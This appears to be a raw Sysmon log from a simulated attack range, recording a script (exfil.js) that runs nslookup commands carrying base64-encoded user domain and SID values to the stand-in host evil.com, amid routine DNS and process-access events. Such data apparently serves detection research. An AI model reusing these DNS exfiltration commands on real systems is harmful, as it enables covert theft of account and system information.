354300x8000000000000000212579Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.628{00000000-0000-0000-0000-000000000000}3864<unknown process>-udptruefalse127.0.0.1-51006-false127.0.0.1-53domain 354300x8000000000000000212578Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.628{00000000-0000-0000-0000-000000000000}3864<unknown process>-udpfalsefalse127.0.0.1-51005-false127.0.0.1-53domain 354300x8000000000000000212577Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.628{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51005- 354300x8000000000000000212576Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.628{00000000-0000-0000-0000-000000000000}3864<unknown process>-udpfalsefalse127.0.0.1-51004-false127.0.0.1-53domain 354300x8000000000000000212575Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.628{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51004- 354300x8000000000000000212574Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.552{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51003- 354300x8000000000000000212573Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.552{00000000-0000-0000-0000-000000000000}5592<unknown process>-udpfalsefalse127.0.0.1-51002-false127.0.0.1-53domain 354300x8000000000000000212572Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.552{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51002- 354300x8000000000000000212571Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.552{00000000-0000-0000-0000-000000000000}5592<unknown process>-udptruefalse127.0.0.1-51002-false127.0.0.1-53domain 354300x8000000000000000212570Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.551{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51001- 354300x8000000000000000212569Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.474{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51000- 354300x8000000000000000212568Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.474{00000000-0000-0000-0000-000000000000}5036<unknown process>-udpfalsefalse127.0.0.1-50999-false127.0.0.1-53domain 354300x8000000000000000212567Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.474{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50999- 354300x8000000000000000212566Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.474{00000000-0000-0000-0000-000000000000}5036<unknown process>-udptruefalse127.0.0.1-50999-false127.0.0.1-53domain 10341000x8000000000000000212565Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.222{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F6-629A-1D45-000000005F02}6408C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212564Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.222{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F6-629A-1D45-000000005F02}6408C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000212563Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.474{00000000-0000-0000-0000-000000000000}5036<unknown process>-udpfalsefalse127.0.0.1-50998-false127.0.0.1-53domain 354300x8000000000000000212562Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.886{00000000-0000-0000-0000-000000000000}7036<unknown process>-udptruefalse127.0.0.1-50980-false127.0.0.1-53domain 354300x8000000000000000212561Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.885{00000000-0000-0000-0000-000000000000}7036<unknown process>-udpfalsefalse127.0.0.1-50979-false127.0.0.1-53domain 354300x8000000000000000212560Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.885{00000000-0000-0000-0000-000000000000}7036<unknown process>-udptruefalse127.0.0.1-50979-false127.0.0.1-53domain 354300x8000000000000000212559Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.794{00000000-0000-0000-0000-000000000000}3712<unknown process>-udpfalsefalse127.0.0.1-50978-false127.0.0.1-53domain 354300x8000000000000000212558Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.794{00000000-0000-0000-0000-000000000000}3712<unknown process>-udptruefalse127.0.0.1-50978-false127.0.0.1-53domain 354300x8000000000000000212557Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.794{00000000-0000-0000-0000-000000000000}3712<unknown process>-udpfalsefalse127.0.0.1-50977-false127.0.0.1-53domain 354300x8000000000000000212556Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.794{00000000-0000-0000-0000-000000000000}3712<unknown process>-udptruefalse127.0.0.1-50977-false127.0.0.1-53domain 354300x8000000000000000212555Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.793{00000000-0000-0000-0000-000000000000}3712<unknown process>-udpfalsefalse127.0.0.1-50976-false127.0.0.1-53domain 354300x8000000000000000212554Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.793{00000000-0000-0000-0000-000000000000}3712<unknown process>-udptruefalse127.0.0.1-50976-false127.0.0.1-53domain 10341000x8000000000000000212553Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.206{2E1864BB-18F6-629A-1D45-000000005F02}64087204C:\Windows\system32\conhost.exe{2E1864BB-18F6-629A-1C45-000000005F02}6888C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212552Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.206{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F6-629A-1D45-000000005F02}6408C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212551Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.206{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212550Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.206{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212549Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.191{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212548Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.191{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212547Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.191{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F6-629A-1C45-000000005F02}6888C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212546Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.191{2E1864BB-18E0-629A-6742-000000005F02}39764836C:\Windows\System32\WScript.exe{2E1864BB-18F6-629A-1C45-000000005F02}6888C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212545Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.205{2E1864BB-18F6-629A-1C45-000000005F02}6888C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnxkxa.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000212544Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.191{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlidq.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000212543Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.169{2E1864BB-18F6-629A-1A45-000000005F02}52325136C:\Windows\system32\conhost.exe{2E1864BB-18F6-629A-1B45-000000005F02}6984C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212542Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.169{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F6-629A-1B45-000000005F02}6984C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212541Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.169{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212540Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.153{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212539Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.153{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212538Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.153{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212537Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.153{2E1864BB-18F6-629A-1945-000000005F02}70528132C:\Windows\system32\cmd.exe{2E1864BB-18F6-629A-1B45-000000005F02}6984C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212536Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.167{2E1864BB-18F6-629A-1B45-000000005F02}6984C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F6-629A-1945-000000005F02}7052C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlidq.tmp 2>&1 10341000x8000000000000000212535Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.138{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F6-629A-1A45-000000005F02}5232C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212534Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.138{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F6-629A-1A45-000000005F02}5232C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212533Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.138{2E1864BB-18F6-629A-1A45-000000005F02}52325136C:\Windows\system32\conhost.exe{2E1864BB-18F6-629A-1945-000000005F02}7052C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212532Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.122{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F6-629A-1A45-000000005F02}5232C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212531Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.122{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212530Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 